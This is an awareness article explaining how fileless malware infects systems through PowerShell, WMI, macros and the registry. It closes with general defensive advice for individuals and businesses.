How to Recognize and Successfully Resist Fileless Malware Threats
By Artsiom Balabanau on
Cyber attacks pose a serious threat to any digital business. By using stolen credentials and compromised devices, hackers gain access to valuable information. Malefactors are becoming more and more cunning, finding loopholes in virtually any new technology. Cybersecurity Ventures predicts that, by 2025, costs for IT security services will rise to $10.5 trillion a year.
The use of fileless malware by hackers is growing at an incredible rate. According to Trend Micro, in 2019, the number of such attacks increased by 265%. What is this horrifying weapon - fileless malware? How can we combat it? We are going to discuss these issues in this article.
What is fileless malware?
Fileless or bodiless malware is a new method of infecting a device - a malicious program that leaves no traces on the hard drive, working entirely in RAM. Fileless attacks penetrate the network through common entry points: memory, PowerShell, Microsoft Office macros, Windows management interface, and so on. To make it clearer, let's take a look at how a computer becomes infected with standard malware. For example, a user downloads an infected file to their laptop. The virus gradually embeds in program files (command files, executable files, files with device drivers, etc.). The presence of such unwanted "guests" affects the speed of a computer: files and drives get damaged, programs stop functioning, and so on. The worst thing is that this malware can steal passwords, credit card numbers, and other confidential information saved in a browser.
Want more tech news? Subscribe to ComputingEdge Newsletter Today!
How does fileless malware work?
Fileless malware uses licensed trusted programs running in the operating system. For example, in December 2019, fileless malware for macOS was discovered, disguised as part of a cryptocurrency program called UnionCryptoTrader.dmg. A trojanized version of the legal application setup file was distributed from a cryptocurrency arbitrage website. A fileless malware attack usually starts with a user’s action. A person receives a well-disguised spam message, clicks on the link, and is redirected to a malicious website. Next, the fake website initiates Adobe Flash - a common attack vector. Flash calls PowerShell and enters instructions on the command line into the user's computer memory. One of these instructions connects to the C&C server and downloads a malicious PowerShell script that finds sensitive data and extracts it. Fileless malware can enter a device's memory in the following ways:- via emails, links, or malicious downloads that look legal;
- via installed trusted applications (Microsoft Word or JavaScript);
- via licensed programs (Windows Management Instrumentation (WMI) or Microsoft PowerShell);
- via hacker websites, when a Flash plugin allows malicious code to run in the browser's memory.
Types of fileless malware attacks
Cyber security experts distinguish three main categories of fileless attacks: 1. Manipulations of Windows registry This type of attack involves a malicious file or link. When you download such a file or follow the link, a normal Windows process starts to write and execute fileless code into the registry. 2. Memory code injection This method involves hiding malicious code in the memory of legitimate applications. While the operating system is running, the malware is spreading and reinserting itself into processes. Since the "wreckers" use official Windows programs (for example, PowerShell and MWI), antivirus software can't find anything wrong. 3. Script-based methods Script-based methods may be only partially fileless, but they are still difficult to find. This is how the ransomware SamSam and Operation Cobalt Kitty work. Fileless malware damages the system as long as it remains hidden.How you can protect your company from fileless attacks
What makes fileless attacks so insidious also makes them elusive. As we mentioned above, an antivirus is not able to detect them because they take place in a computer's memory. It is easy for cyber criminals to get away with that, as after a system reboots, the malware disappears. What should be done in this situation? How can people protect themselves and their businesses? Speaking about personal security, fileless attacks often count on users’ unawareness. To prevent malware from entering your device, you need to be careful when downloading or installing applications, clicking on links, and opening emails. It is important to regularly update your computer and programs - this will prevent the use of common vulnerabilities. When considering security within a business, enlisting the support of a vendor providing cyber security services is ideal. You won't be able to protect yourself using traditional methods, but fortunately, there are new solutions:- Network detection and response
- Data streaming technology
- Disabling macros
- Tracking unauthorized traffic
Conclusion
Malicious software can live on a company's network for a long time before being revealed. The longer the hack goes unnoticed, the greater the damage from its consequences. RiskIQ estimates that losses due to phishing attacks amount to $17,700 per minute. Traditional methods of fighting against malware programs are no longer as effective as they once were to protect networks from hackers. It is necessary to use a combination of tools and strategies that minimize the number of loopholes for attackers. Cyber security assessment services is one way you can have a comprehensive network audit of password policies, antivirus, firewalls, and data backups. A custom cutting-edge solution will help you ensure the safety of information and avoid tremendous financial losses.
Read Next
